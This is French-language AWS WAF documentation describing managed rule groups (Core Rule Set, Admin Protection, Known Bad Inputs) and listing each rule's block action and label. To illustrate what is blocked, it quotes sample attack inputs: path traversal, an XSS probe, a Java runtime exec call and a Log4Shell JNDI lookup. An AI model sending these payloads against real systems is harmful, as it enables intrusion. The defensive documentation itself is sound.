AWS Les règles gérées sont conçues pour vous protéger contre les menaces Web les plus courantes. Lorsqu'ils sont utilisés conformément à la documentation, les groupes de règles AWS gérées ajoutent un niveau de sécurité supplémentaire à vos applications. Cependant, les groupes de règles AWS gérées ne sont pas destinés à remplacer vos responsabilités en matière de sécurité, qui sont déterminées par les AWS ressources que vous sélectionnez. Reportez-vous au [modèle de responsabilité partagée](https://aws.amazon.com/compliance/shared-responsibility-model/) pour vous assurer que vos ressources AWS sont correctement protégées. 

**Important**  
AWS Les règles gérées sont conçues pour vous protéger contre les menaces Web les plus courantes. Lorsqu'ils sont utilisés conformément à la documentation, les groupes de règles AWS gérées ajoutent un niveau de sécurité supplémentaire à vos applications. Cependant, les groupes de règles AWS gérées ne sont pas destinés à remplacer vos responsabilités en matière de sécurité, qui sont déterminées par les AWS ressources que vous sélectionnez. Reportez-vous au [modèle de responsabilité partagée](https://aws.amazon.com/compliance/shared-responsibility-model/) pour vous assurer que vos ressources AWS sont correctement protégées. 

# AWS Liste des groupes de règles gérées
<a name="aws-managed-rule-groups-list"></a>

Cette section fournit une liste des groupes de règles AWS gérées disponibles.

Cette section décrit les versions les plus récentes des groupes de règles AWS gérées. Vous les voyez sur la console lorsque vous ajoutez un groupe de règles géré à votre pack de protection (ACL Web). Grâce à l'API, vous pouvez récupérer cette liste ainsi que les groupes de AWS Marketplace règles auxquels vous êtes abonné en appelant`ListAvailableManagedRuleGroups`. 

**Note**  
Pour plus d'informations sur la récupération des versions d'un groupe de règles AWS gérées, consultez[Extraction des versions disponibles pour un groupe de règles géré](waf-using-managed-rule-groups-versions.md). 

Tous les groupes de règles AWS gérées prennent en charge l'étiquetage, et les listes de règles de cette section incluent les spécifications des étiquettes. Vous pouvez récupérer les étiquettes d'un groupe de règles géré via l'API en appelant`DescribeManagedRuleGroup`. Les étiquettes sont répertoriées dans la AvailableLabels propriété de la réponse. Pour plus d'informations sur l'étiquetage, consultez[Étiquetage des requêtes Web dans AWS WAF](waf-labels.md).

Testez et ajustez les modifications apportées à vos AWS WAF protections avant de les utiliser pour le trafic de production. Pour plus d'informations, consultez [Tester et ajuster vos AWS WAF protections](web-acl-testing.md).

**Contents**
+ [Groupes de règles de référence](aws-managed-rule-groups-baseline.md)
  + [Groupe de règles géré par un ensemble de règles de base (CRS)](aws-managed-rule-groups-baseline.md#aws-managed-rule-groups-baseline-crs)
  + [Groupe de règles géré par la protection des administrateurs](aws-managed-rule-groups-baseline.md#aws-managed-rule-groups-baseline-admin)
  + [Groupe de règles géré pour les entrées erronées connues](aws-managed-rule-groups-baseline.md#aws-managed-rule-groups-baseline-known-bad-inputs)
+ [Groupes de règles spécifiques au cas d'utilisation](aws-managed-rule-groups-use-case.md)
  + [Groupe de règles géré par base de données SQL](aws-managed-rule-groups-use-case.md#aws-managed-rule-groups-use-case-sql-db)
  + [Groupe de règles géré par le système d'exploitation Linux](aws-managed-rule-groups-use-case.md#aws-managed-rule-groups-use-case-linux-os)
  + [Groupe de règles géré par le système d'exploitation POSIX](aws-managed-rule-groups-use-case.md#aws-managed-rule-groups-use-case-posix-os)
  + [Groupe de règles géré par le système d'exploitation Windows](aws-managed-rule-groups-use-case.md#aws-managed-rule-groups-use-case-windows-os)
  + [Groupe de règles géré par une application PHP](aws-managed-rule-groups-use-case.md#aws-managed-rule-groups-use-case-php-app)
  + [WordPress groupe de règles géré par les applications](aws-managed-rule-groups-use-case.md#aws-managed-rule-groups-use-case-wordpress-app)
+ [Groupes de règles de réputation IP](aws-managed-rule-groups-ip-rep.md)
  + [Groupe de règles géré par Amazon IP Reputation](aws-managed-rule-groups-ip-rep.md#aws-managed-rule-groups-ip-rep-amazon)
  + [Groupe de règles géré par liste d'adresses IP anonyme](aws-managed-rule-groups-ip-rep.md#aws-managed-rule-groups-ip-rep-anonymous)
+ [AWS WAF Groupe de règles de prévention de la fraude (ACFP) pour la création de comptes et la prévention des fraudes](aws-managed-rule-groups-acfp.md)
  + [Considérations relatives à l'utilisation de ce groupe de règles](aws-managed-rule-groups-acfp.md#aws-managed-rule-groups-acfp-using)
  + [Étiquettes ajoutées par ce groupe de règles](aws-managed-rule-groups-acfp.md#aws-managed-rule-groups-acfp-labels)
    + [Étiquettes à jetons](aws-managed-rule-groups-acfp.md#aws-managed-rule-groups-acfp-labels-token)
    + [Étiquettes ACFP](aws-managed-rule-groups-acfp.md#aws-managed-rule-groups-acfp-labels-rg)
  + [Liste des règles de prévention des fraudes relatives à la création de comptes](aws-managed-rule-groups-acfp.md#aws-managed-rule-groups-acfp-rules)
+ [AWS WAF Groupe de règles de prévention des prises de contrôle des fraudes (ATP)](aws-managed-rule-groups-atp.md)
  + [Considérations relatives à l'utilisation de ce groupe de règles](aws-managed-rule-groups-atp.md#aws-managed-rule-groups-atp-using)
  + [Étiquettes ajoutées par ce groupe de règles](aws-managed-rule-groups-atp.md#aws-managed-rule-groups-atp-labels)
    + [Étiquettes à jetons](aws-managed-rule-groups-atp.md#aws-managed-rule-groups-atp-labels-token)
    + [Étiquettes ATP](aws-managed-rule-groups-atp.md#aws-managed-rule-groups-atp-labels-rg)
  + [Liste des règles de prévention du piratage de compte](aws-managed-rule-groups-atp.md#aws-managed-rule-groups-atp-rules)
+ [AWS WAF Groupe de règles Bot Control](aws-managed-rule-groups-bot.md)
  + [Niveaux de protection](aws-managed-rule-groups-bot.md#aws-managed-rule-groups-bot-prot-levels)
  + [Considérations relatives à l'utilisation de ce groupe de règles](aws-managed-rule-groups-bot.md#aws-managed-rule-groups-bot-using)
  + [Étiquettes ajoutées par ce groupe de règles](aws-managed-rule-groups-bot.md#aws-managed-rule-groups-bot-labels)
    + [Étiquettes à jetons](aws-managed-rule-groups-bot.md#aws-managed-rule-groups-bot-labels-token)
    + [Étiquettes Bot Control](aws-managed-rule-groups-bot.md#aws-managed-rule-groups-bot-labels-rg)
  + [Liste des règles de contrôle des bots](aws-managed-rule-groups-bot.md#aws-managed-rule-groups-bot-rules)
+ [AWS WAF Groupe de règles de prévention du déni de service distribué (DDoS)](aws-managed-rule-groups-anti-ddos.md)
  + [Considérations relatives à l'utilisation de ce groupe de règles](aws-managed-rule-groups-anti-ddos.md#aws-managed-rule-groups-anti-ddos-using)
  + [Étiquettes ajoutées par ce groupe de règles](aws-managed-rule-groups-anti-ddos.md#aws-managed-rule-groups-anti-ddos-labels)
    + [Étiquettes à jetons](aws-managed-rule-groups-anti-ddos.md#aws-managed-rule-groups-anti-ddos-labels-token)
    + [Étiquettes DDo anti-S](aws-managed-rule-groups-anti-ddos.md#aws-managed-rule-groups-anti-ddos-labels-rg)
  + [Liste des règles DDo anti-S](aws-managed-rule-groups-anti-ddos.md#aws-managed-rule-groups-anti-ddos-rules)

# Groupes de règles de référence
<a name="aws-managed-rule-groups-baseline"></a>

Les groupes de règles gérées de base offrent une protection générale contre une grande variété de menaces courantes. Choisissez un ou plusieurs de ces groupes de règles pour établir une protection de base pour vos ressources. 

## Groupe de règles géré par un ensemble de règles de base (CRS)
<a name="aws-managed-rule-groups-baseline-crs"></a>

VendorName:`AWS`, Nom :`AWSManagedRulesCommonRuleSet`, WCU : 700

**Note**  
Cette documentation couvre la version statique la plus récente de ce groupe de règles géré. Nous signalons les modifications de version dans le journal des modifications à l'adresse. [AWS Journal des modifications des règles gérées](aws-managed-rule-groups-changelog.md) Pour plus d'informations sur les autres versions, utilisez la commande API [DescribeManagedRuleGroup](https://docs.aws.amazon.com/waf/latest/APIReference/API_DescribeManagedRuleGroup.html).   
Les informations que nous publions concernant les règles des groupes de règles AWS gérées visent à vous fournir les informations dont vous avez besoin pour utiliser les règles sans donner aux acteurs malveillants ce dont ils ont besoin pour les contourner.   
Si vous avez besoin de plus d'informations que celles que vous trouverez ici, contactez le [AWS Support Centre](https://console.aws.amazon.com/support/home#/). 

Le groupe de règles de base (CRS) contient des règles généralement applicables aux applications Web. Cela fournit une protection contre l'exploitation d'un large éventail de vulnérabilités, y compris certaines des vulnérabilités à haut risque et fréquentes décrites dans les publications de l'OWASP telles que le Top 10 de l'[OWASP](https://owasp.org/www-project-top-ten/). Envisagez d'utiliser ce groupe de règles pour tous les cas AWS WAF d'utilisation.

Ce groupe de règles géré ajoute des étiquettes aux requêtes Web qu'il évalue, lesquelles sont accessibles aux règles exécutées après ce groupe de règles dans votre pack de protection (ACL Web). AWS WAF enregistre également les étiquettes selon les CloudWatch statistiques d'Amazon. Pour obtenir des informations générales sur les étiquettes et les mesures relatives aux étiquettes, reportez-vous [Étiquetage des requêtes Web](waf-labels.md) aux sections et[Métriques et dimensions des étiquettes](waf-metrics.md#waf-metrics-label). 


| Nom de la règle | Description et étiquette | 
| --- | --- | 
| NoUserAgent\$1HEADER |  Vérifie les requêtes pour lesquelles il manque l'`User-Agent`en-tête HTTP. Action de la règle Block Libellé : `awswaf:managed:aws:core-rule-set:NoUserAgent_Header`  | 
| UserAgent\$1BadBots\$1HEADER |  Vérifie les valeurs `User-Agent` d'en-tête communes qui indiquent que la demande est un robot défectueux. Les exemples de modèles incluent `nessus` et `nmap`. Pour la gestion des bots, voir également[AWS WAF Groupe de règles Bot Control](aws-managed-rule-groups-bot.md).  Action de la règle Block Libellé : `awswaf:managed:aws:core-rule-set:BadBots_Header`  | 
| SizeRestrictions\$1QUERYSTRING |  Inspecte les chaînes de requête d'URI de plus de 2 048 octets.  Action de la règle Block Libellé : `awswaf:managed:aws:core-rule-set:SizeRestrictions_QueryString`  | 
| SizeRestrictions\$1Cookie\$1HEADER |  Vérifie la présence d'en-têtes de cookies de plus de 10 240 octets.  Action de la règle Block Libellé : `awswaf:managed:aws:core-rule-set:SizeRestrictions_Cookie_Header`  | 
| SizeRestrictions\$1BODY |  Vérifie les corps de demande dont la taille est supérieure à 8 Ko (8 192 octets).  Action de la règle Block Libellé : `awswaf:managed:aws:core-rule-set:SizeRestrictions_Body`  | 
| SizeRestrictions\$1URIPATH |  Inspecte les chemins d'URI de plus de 1 024 octets.  Action de la règle Block Libellé : `awswaf:managed:aws:core-rule-set:SizeRestrictions_URIPath`  | 
| EC2MetaDataSSRF\$1BODY |  Inspecte les tentatives d'exfiltration des métadonnées Amazon EC2 du corps de la demande.  Cette règle inspecte uniquement le corps de la demande jusqu'à la limite de taille fixée pour le pack de protection (ACL Web) et le type de ressource. Pour Application Load Balancer et AWS AppSync, la limite est fixée à 8 Ko. Pour API Gateway CloudFront, Amazon Cognito, App Runner et Verified Access, la limite par défaut est de 16 Ko et vous pouvez l'augmenter jusqu'à 64 Ko dans la configuration de votre pack de protection (ACL Web). Cette règle utilise l'`Continue`option de gestion du contenu surdimensionné. Pour de plus amples informations, veuillez consulter [Composants de requête Web surdimensionnés dans AWS WAF](waf-oversize-request-components.md).  Action de la règle Block Libellé : `awswaf:managed:aws:core-rule-set:EC2MetaDataSSRF_Body`  | 
| EC2MetaDataSSRF\$1COOKIE |  Détecte les tentatives d'exfiltration des métadonnées Amazon EC2 du cookie de demande.  Action de la règle Block Libellé : `awswaf:managed:aws:core-rule-set:EC2MetaDataSSRF_Cookie`  | 
| EC2MetaDataSSRF\$1URIPATH |  Inspecte les tentatives d'exfiltration des métadonnées Amazon EC2 depuis le chemin de l'URI de la demande.  Action de la règle Block Libellé : `awswaf:managed:aws:core-rule-set:EC2MetaDataSSRF_URIPath`  | 
| EC2MetaDataSSRF\$1QUERYARGUMENTS |  Inspecte les tentatives d'exfiltration des métadonnées Amazon EC2 à partir des arguments de requête.  Action de la règle Block Libellé : `awswaf:managed:aws:core-rule-set:EC2MetaDataSSRF_QueryArguments`  | 
| GenericLFI\$1QUERYARGUMENTS |  Inspecte la présence d'exploits LFI (Local File Inclusion) dans les arguments de la demande. Les exemples incluent les tentatives de traversée de chemin en utilisant des techniques comme `../../`.  Action de la règle Block Libellé : `awswaf:managed:aws:core-rule-set:GenericLFI_QueryArguments`  | 
| GenericLFI\$1URIPATH |  Inspecte la présence d'exploits LFI (Local File Inclusion) dans le chemin d'URI. Les exemples incluent les tentatives de traversée de chemin en utilisant des techniques comme `../../`.  Action de la règle Block Libellé : `awswaf:managed:aws:core-rule-set:GenericLFI_URIPath`  | 
| GenericLFI\$1BODY |  Inspecte la présence d'exploits LFI (Local File Inclusion) dans le corps de la demande. Les exemples incluent les tentatives de traversée de chemin en utilisant des techniques comme `../../`.  Cette règle inspecte uniquement le corps de la demande jusqu'à la limite de taille fixée pour le pack de protection (ACL Web) et le type de ressource. Pour Application Load Balancer et AWS AppSync, la limite est fixée à 8 Ko. Pour API Gateway CloudFront, Amazon Cognito, App Runner et Verified Access, la limite par défaut est de 16 Ko et vous pouvez l'augmenter jusqu'à 64 Ko dans la configuration de votre pack de protection (ACL Web). Cette règle utilise l'`Continue`option de gestion du contenu surdimensionné. Pour de plus amples informations, veuillez consulter [Composants de requête Web surdimensionnés dans AWS WAF](waf-oversize-request-components.md).  Action de la règle Block Libellé : `awswaf:managed:aws:core-rule-set:GenericLFI_Body`  | 
| RestrictedExtensions\$1URIPATH |  Vérifie les demandes dont les chemins d'URI contiennent des extensions de fichiers système dont la lecture ou l'exécution ne sont pas sûres. Les exemples de modèles incluent des extensions comme `.log` et `.ini`.  Action de la règle Block Libellé : `awswaf:managed:aws:core-rule-set:RestrictedExtensions_URIPath`  | 
| RestrictedExtensions\$1QUERYARGUMENTS |  Vérifie les demandes dont les arguments de requête contiennent des extensions de fichiers système dont la lecture ou l'exécution ne sont pas sûres. Les exemples de modèles incluent des extensions comme `.log` et `.ini`.  Action de la règle Block Libellé : `awswaf:managed:aws:core-rule-set:RestrictedExtensions_QueryArguments`  | 
| GenericRFI\$1QUERYARGUMENTS |  Inspecte les valeurs de tous les paramètres de requête pour détecter les tentatives d'exploitation de RFI (Remote File Inclusion) dans les applications Web en URLs incorporant des adresses. IPv4 Les exemples incluent des modèles tels que `http://` `https://``ftp://`,,`ftps://`, et`file://`, avec un en-tête d' IPv4 hôte dans la tentative d'exploitation.  Action de la règle Block Libellé : `awswaf:managed:aws:core-rule-set:GenericRFI_QueryArguments`  | 
| GenericRFI\$1BODY |  Inspecte le corps de la demande pour détecter toute tentative d'exploitation de RFI (Remote File Inclusion) dans les applications Web en URLs incorporant des adresses. IPv4 Les exemples incluent des modèles tels que `http://` `https://``ftp://`,,`ftps://`, et`file://`, avec un en-tête d' IPv4 hôte dans la tentative d'exploitation.  Cette règle inspecte uniquement le corps de la demande jusqu'à la limite de taille fixée pour le pack de protection (ACL Web) et le type de ressource. Pour Application Load Balancer et AWS AppSync, la limite est fixée à 8 Ko. Pour API Gateway CloudFront, Amazon Cognito, App Runner et Verified Access, la limite par défaut est de 16 Ko et vous pouvez l'augmenter jusqu'à 64 Ko dans la configuration de votre pack de protection (ACL Web). Cette règle utilise l'`Continue`option de gestion du contenu surdimensionné. Pour de plus amples informations, veuillez consulter [Composants de requête Web surdimensionnés dans AWS WAF](waf-oversize-request-components.md).  Action de la règle Block Libellé : `awswaf:managed:aws:core-rule-set:GenericRFI_Body`  | 
| GenericRFI\$1URIPATH |  Inspecte le chemin de l'URI pour détecter les tentatives d'exploitation de RFI (Remote File Inclusion) dans les applications Web en URLs incorporant des adresses. IPv4 Les exemples incluent des modèles tels que `http://` `https://``ftp://`,,`ftps://`, et`file://`, avec un en-tête d' IPv4 hôte dans la tentative d'exploitation.  Action de la règle Block Libellé : `awswaf:managed:aws:core-rule-set:GenericRFI_URIPath`  | 
| CrossSiteScripting\$1COOKIE |  Inspecte les valeurs des en-têtes de cookies pour détecter les modèles courants de script intersite (XSS) à l'aide de la fonction intégrée. AWS WAF [Instruction d'attaque par scripts inter-site de règle](waf-rule-statement-type-xss-match.md) Les exemples de modèles incluent des scripts comme `<script>alert("hello")</script>`.   Les détails de correspondance des règles dans les AWS WAF journaux ne sont pas renseignés pour la version 2.0 de ce groupe de règles.   Action de la règle Block Libellé : `awswaf:managed:aws:core-rule-set:CrossSiteScripting_Cookie`  | 
| CrossSiteScripting\$1QUERYARGUMENTS |  Inspecte les valeurs des arguments de requête pour détecter les modèles de script intersite (XSS) courants à l'aide de la fonction intégrée. AWS WAF [Instruction d'attaque par scripts inter-site de règle](waf-rule-statement-type-xss-match.md) Les exemples de modèles incluent des scripts comme `<script>alert("hello")</script>`.   Les détails de correspondance des règles dans les AWS WAF journaux ne sont pas renseignés pour la version 2.0 de ce groupe de règles.   Action de la règle Block Libellé : `awswaf:managed:aws:core-rule-set:CrossSiteScripting_QueryArguments`  | 
| CrossSiteScripting\$1BODY |  Inspecte le corps de la requête à la recherche de modèles de script intersite (XSS) courants à l'aide de la fonction intégrée. AWS WAF [Instruction d'attaque par scripts inter-site de règle](waf-rule-statement-type-xss-match.md) Les exemples de modèles incluent des scripts comme `<script>alert("hello")</script>`.   Les détails de correspondance des règles dans les AWS WAF journaux ne sont pas renseignés pour la version 2.0 de ce groupe de règles.   Cette règle inspecte uniquement le corps de la demande jusqu'à la limite de taille fixée pour le pack de protection (ACL Web) et le type de ressource. Pour Application Load Balancer et AWS AppSync, la limite est fixée à 8 Ko. Pour API Gateway CloudFront, Amazon Cognito, App Runner et Verified Access, la limite par défaut est de 16 Ko et vous pouvez l'augmenter jusqu'à 64 Ko dans la configuration de votre pack de protection (ACL Web). Cette règle utilise l'`Continue`option de gestion du contenu surdimensionné. Pour de plus amples informations, veuillez consulter [Composants de requête Web surdimensionnés dans AWS WAF](waf-oversize-request-components.md).  Action de la règle Block Libellé : `awswaf:managed:aws:core-rule-set:CrossSiteScripting_Body`  | 
| CrossSiteScripting\$1URIPATH |  Inspecte la valeur du chemin d'URI pour détecter les modèles de script intersite (XSS) courants à l'aide de la fonction intégrée. AWS WAF [Instruction d'attaque par scripts inter-site de règle](waf-rule-statement-type-xss-match.md) Les exemples de modèles incluent des scripts comme `<script>alert("hello")</script>`.   Les détails de correspondance des règles dans les AWS WAF journaux ne sont pas renseignés pour la version 2.0 de ce groupe de règles.   Action de la règle Block Libellé : `awswaf:managed:aws:core-rule-set:CrossSiteScripting_URIPath`  | 

## Groupe de règles géré par la protection des administrateurs
<a name="aws-managed-rule-groups-baseline-admin"></a>

VendorName:`AWS`, Nom :`AWSManagedRulesAdminProtectionRuleSet`, WCU : 100

**Note**  
Cette documentation couvre la version statique la plus récente de ce groupe de règles géré. Nous signalons les modifications de version dans le journal des modifications à l'adresse. [AWS Journal des modifications des règles gérées](aws-managed-rule-groups-changelog.md) Pour plus d'informations sur les autres versions, utilisez la commande API [DescribeManagedRuleGroup](https://docs.aws.amazon.com/waf/latest/APIReference/API_DescribeManagedRuleGroup.html).   
Les informations que nous publions concernant les règles des groupes de règles AWS gérées visent à vous fournir les informations dont vous avez besoin pour utiliser les règles sans donner aux acteurs malveillants ce dont ils ont besoin pour les contourner.   
Si vous avez besoin de plus d'informations que celles que vous trouverez ici, contactez le [AWS Support Centre](https://console.aws.amazon.com/support/home#/). 

Le groupe de règles Protection administrateur contient des règles qui vous permettent de bloquer l'accès externe aux pages administratives exposées. Cela peut être utile si vous exécutez un logiciel tiers ou si vous souhaitez réduire le risque qu'un acteur malveillant accède à votre application comme administrateur.

Ce groupe de règles géré ajoute des étiquettes aux requêtes Web qu'il évalue, lesquelles sont accessibles aux règles exécutées après ce groupe de règles dans votre pack de protection (ACL Web). AWS WAF enregistre également les étiquettes selon les CloudWatch statistiques d'Amazon. Pour obtenir des informations générales sur les étiquettes et les mesures relatives aux étiquettes, reportez-vous [Étiquetage des requêtes Web](waf-labels.md) aux sections et[Métriques et dimensions des étiquettes](waf-metrics.md#waf-metrics-label). 


| Nom de la règle | Description et étiquette | 
| --- | --- | 
| AdminProtection\$1URIPATH |  Inspecte les chemins d'URI qui sont généralement réservés à l'administration d'un serveur Web ou d'une application. Les exemples de modèles incluent `sqlmanager`.  Action de la règle Block Libellé : `awswaf:managed:aws:admin-protection:AdminProtection_URIPath`  | 

## Groupe de règles géré pour les entrées erronées connues
<a name="aws-managed-rule-groups-baseline-known-bad-inputs"></a>

VendorName:`AWS`, Nom :`AWSManagedRulesKnownBadInputsRuleSet`, WCU : 200

**Note**  
Cette documentation couvre la version statique la plus récente de ce groupe de règles géré. Nous signalons les modifications de version dans le journal des modifications à l'adresse. [AWS Journal des modifications des règles gérées](aws-managed-rule-groups-changelog.md) Pour plus d'informations sur les autres versions, utilisez la commande API [DescribeManagedRuleGroup](https://docs.aws.amazon.com/waf/latest/APIReference/API_DescribeManagedRuleGroup.html).   
Les informations que nous publions concernant les règles des groupes de règles AWS gérées visent à vous fournir les informations dont vous avez besoin pour utiliser les règles sans donner aux acteurs malveillants ce dont ils ont besoin pour les contourner.   
Si vous avez besoin de plus d'informations que celles que vous trouverez ici, contactez le [AWS Support Centre](https://console.aws.amazon.com/support/home#/). 

Le groupe de règles Known Bad Inputs (Entrées défectueuses connues) contient des règles permettant de bloquer les modèles de demande connus comme non valides et associés à l'exploitation ou à la découverte de vulnérabilités. Cela peut aider à réduire le risque qu'un acteur malveillant ne découvre une application vulnérable.

Ce groupe de règles géré ajoute des étiquettes aux requêtes Web qu'il évalue, lesquelles sont accessibles aux règles exécutées après ce groupe de règles dans votre pack de protection (ACL Web). AWS WAF enregistre également les étiquettes selon les CloudWatch statistiques d'Amazon. Pour obtenir des informations générales sur les étiquettes et les mesures relatives aux étiquettes, reportez-vous [Étiquetage des requêtes Web](waf-labels.md) aux sections et[Métriques et dimensions des étiquettes](waf-metrics.md#waf-metrics-label). 


| Nom de la règle | Description et étiquette | 
| --- | --- | 
| JavaDeserializationRCE\$1HEADER |  Inspecte les clés et les valeurs des en-têtes de requêtes HTTP pour détecter des modèles indiquant des tentatives d'exécution de commandes à distance (RCE) de Java, tels que les vulnérabilités Spring Core et Cloud Function RCE (CVE-22963, CVE-22965). Les exemples de modèles incluent `(java.lang.Runtime).getRuntime().exec("whoami")`.  Cette règle inspecte uniquement les 8 premiers Ko des en-têtes de demande ou les 200 premiers en-têtes, selon la première limite atteinte, et utilise l'`Continue`option de gestion du contenu surdimensionné. Pour de plus amples informations, veuillez consulter [Composants de requête Web surdimensionnés dans AWS WAF](waf-oversize-request-components.md).  Action de la règle Block Libellé : `awswaf:managed:aws:known-bad-inputs:JavaDeserializationRCE_Header`   | 
| JavaDeserializationRCE\$1BODY |  Inspecte le corps de la demande pour détecter des modèles indiquant des tentatives d'exécution de commandes à distance (RCE) de Java, tels que les vulnérabilités Spring Core et Cloud Function RCE (CVE-22963, CVE-22965). Les exemples de modèles incluent `(java.lang.Runtime).getRuntime().exec("whoami")`.  Cette règle inspecte uniquement le corps de la demande jusqu'à la limite de taille fixée pour le pack de protection (ACL Web) et le type de ressource. Pour Application Load Balancer et AWS AppSync, la limite est fixée à 8 Ko. Pour API Gateway CloudFront, Amazon Cognito, App Runner et Verified Access, la limite par défaut est de 16 Ko et vous pouvez l'augmenter jusqu'à 64 Ko dans la configuration de votre pack de protection (ACL Web). Cette règle utilise l'`Continue`option de gestion du contenu surdimensionné. Pour de plus amples informations, veuillez consulter [Composants de requête Web surdimensionnés dans AWS WAF](waf-oversize-request-components.md).  Action de la règle Block Libellé : `awswaf:managed:aws:known-bad-inputs:JavaDeserializationRCE_Body`  | 
| JavaDeserializationRCE\$1URIPATH |  Inspecte l'URI de la demande pour détecter des modèles indiquant des tentatives d'exécution de commandes à distance (RCE) de désérialisation en Java, tels que les vulnérabilités Spring Core et Cloud Function RCE (CVE-22963, CVE-22965). Les exemples de modèles incluent `(java.lang.Runtime).getRuntime().exec("whoami")`.  Action de la règle Block Libellé : `awswaf:managed:aws:known-bad-inputs:JavaDeserializationRCE_URIPath`  | 
| JavaDeserializationRCE\$1QUERYSTRING |  Inspecte la chaîne de requête à la recherche de modèles indiquant des tentatives d'exécution à distance (RCE) de désérialisation en Java, tels que les vulnérabilités Spring Core et Cloud Function RCE (CVE-22963, CVE-22965). Les exemples de modèles incluent `(java.lang.Runtime).getRuntime().exec("whoami")`.  Action de la règle Block Libellé : `awswaf:managed:aws:known-bad-inputs:JavaDeserializationRCE_QueryString`  | 
| Host\$1localhost\$1HEADER |  Inspecte l'en-tête de l'hôte dans la demande pour les modèles indiquant localhost. Les exemples de modèles incluent `localhost`.  Action de la règle Block Libellé : `awswaf:managed:aws:known-bad-inputs:Host_Localhost_Header`  | 
| PROPFIND\$1METHOD |  Inspecte la méthode HTTP dans la requête pour `PROPFIND`, qui est une méthode similaire à `HEAD`, mais avec l'intention supplémentaire d'exfiltrer des objets XML.  Action de la règle Block Libellé : `awswaf:managed:aws:known-bad-inputs:Propfind_Method`  | 
| ExploitablePaths\$1URIPATH |  Inspecte le chemin URI pour les tentatives d'accès aux chemins d'application Web exploitables. Les exemples de modèles incluent des chemins comme `web-inf`.  Action de la règle Block Libellé : `awswaf:managed:aws:known-bad-inputs:ExploitablePaths_URIPath`  | 
| Log4JRCE\$1HEADER |  [Inspecte les clés et les valeurs des en-têtes de requête pour détecter la présence de la vulnérabilité Log4j ([CVE-2021-44228, [CVE-2021-45046, CVE-2021-45105](https://www.cve.org/CVERecord?id=CVE-2021-45046)](https://www.cve.org/CVERecord?id=CVE-2021-44228)) et protège contre les tentatives d'exécution de code à distance (RCE).](https://www.cve.org/CVERecord?id=CVE-2021-45105) Les exemples de modèles incluent `${jndi:ldap://example.com/}`.  Cette règle inspecte uniquement les 8 premiers Ko des en-têtes de demande ou les 200 premiers en-têtes, selon la première limite atteinte, et utilise l'`Continue`option de gestion du contenu surdimensionné. Pour de plus amples informations, veuillez consulter [Composants de requête Web surdimensionnés dans AWS WAF](waf-oversize-request-components.md).  Action de la règle Block Libellé : `awswaf:managed:aws:known-bad-inputs:Log4JRCE_Header`  | 
| Log4JRCE\$1QUERYSTRING |  [Inspecte la chaîne de requête pour détecter la présence de la vulnérabilité Log4j ([CVE-2021-44228, [CVE-2021-45046, CVE-2021-45105](https://www.cve.org/CVERecord?id=CVE-2021-45046)](https://www.cve.org/CVERecord?id=CVE-2021-44228)) et protège contre les tentatives d'exécution de code à distance (RCE).](https://www.cve.org/CVERecord?id=CVE-2021-45105) Les exemples de modèles incluent `${jndi:ldap://example.com/}`.  Action de la règle Block Libellé : `awswaf:managed:aws:known-bad-inputs:Log4JRCE_QueryString`  | 
| Log4JRCE\$1BODY |  [Inspecte le corps pour détecter la présence de la vulnérabilité Log4j ([CVE-2021-44228, [CVE-2021-45046, CVE-2021-45105](https://www.cve.org/CVERecord?id=CVE-2021-45046)](https://www.cve.org/CVERecord?id=CVE-2021-44228)) et protège contre les tentatives d'exécution de code à distance (RCE).](https://www.cve.org/CVERecord?id=CVE-2021-45105) Les exemples de modèles incluent `${jndi:ldap://example.com/}`.  Cette règle inspecte uniquement le corps de la demande jusqu'à la limite de taille fixée pour le pack de protection (ACL Web) et le type de ressource. Pour Application Load Balancer et AWS AppSync, la limite est fixée à 8 Ko. Pour API Gateway CloudFront, Amazon Cognito, App Runner et Verified Access, la limite par défaut est de 16 Ko et vous pouvez l'augmenter jusqu'à 64 Ko dans la configuration de votre pack de protection (ACL Web). Cette règle utilise l'`Continue`option de gestion du contenu surdimensionné. Pour de plus amples informations, veuillez consulter [Composants de requête Web surdimensionnés dans AWS WAF](waf-oversize-request-components.md).  Action de la règle Block Libellé : `awswaf:managed:aws:known-bad-inputs:Log4JRCE_Body`  | 
| Log4JRCE\$1URIPATH |  [Inspecte le chemin de l'URI pour détecter la présence de la vulnérabilité Log4j ([CVE-2021-44228, [CVE-2021-45046, CVE-2021-45105](https://www.cve.org/CVERecord?id=CVE-2021-45046)](https://www.cve.org/CVERecord?id=CVE-2021-44228)) et protège contre les tentatives d'exécution de code à distance (RCE).](https://www.cve.org/CVERecord?id=CVE-2021-45105) Les exemples de modèles incluent `${jndi:ldap://example.com/}`.  Action de la règle Block Libellé : `awswaf:managed:aws:known-bad-inputs:Log4JRCE_URIPath`  | 
| ReactJSRCE\$1BODY |  Inspecte le corps de la demande à la recherche de modèles indiquant la présence de CVE-2025-55182.  Cette règle inspecte uniquement le corps de la demande jusqu'à la limite de taille fixée pour le pack de protection (ACL Web) et le type de ressource. Pour Application Load Balancer et AWS AppSync, la limite est fixée à 8 Ko. Pour API Gateway CloudFront, Amazon Cognito, App Runner et AWS Verified Access, la limite par défaut est de 16 Ko et vous pouvez l'augmenter jusqu'à 64 Ko dans la configuration de votre pack de protection (ACL Web). Cette règle utilise l'`CONTINUE`option de gestion du contenu surdimensionné. Pour de plus amples informations, veuillez consulter [Composants de requête Web surdimensionnés dans AWS WAF](waf-oversize-request-components.md).  Action de la règle Block Libellé : `awswaf:managed:aws:known-bad-inputs:ReactJSRCE_Body`  | 

# Groupes de règles spécifiques au cas d'utilisation
<a name="aws-managed-rule-groups-use-case"></a>

Les groupes de règles spécifiques aux cas d'utilisation fournissent une protection incrémentielle pour de nombreux cas d'utilisation différents AWS WAF . Choisissez les groupes de règles qui s'appliquent à votre application. 

## Groupe de règles géré par base de données SQL
<a name="aws-managed-rule-groups-use-case-sql-db"></a>

VendorName:`AWS`, Nom :`AWSManagedRulesSQLiRuleSet`, WCU : 200

**Note**  
Cette documentation couvre la version statique la plus récente de ce groupe de règles géré. Nous signalons les modifications de version dans le journal des modifications à l'adresse. [AWS Journal des modifications des règles gérées](aws-managed-rule-groups-changelog.md) Pour plus d'informations sur les autres versions, utilisez la commande API [DescribeManagedRuleGroup](https://docs.aws.amazon.com/waf/latest/APIReference/API_DescribeManagedRuleGroup.html).   
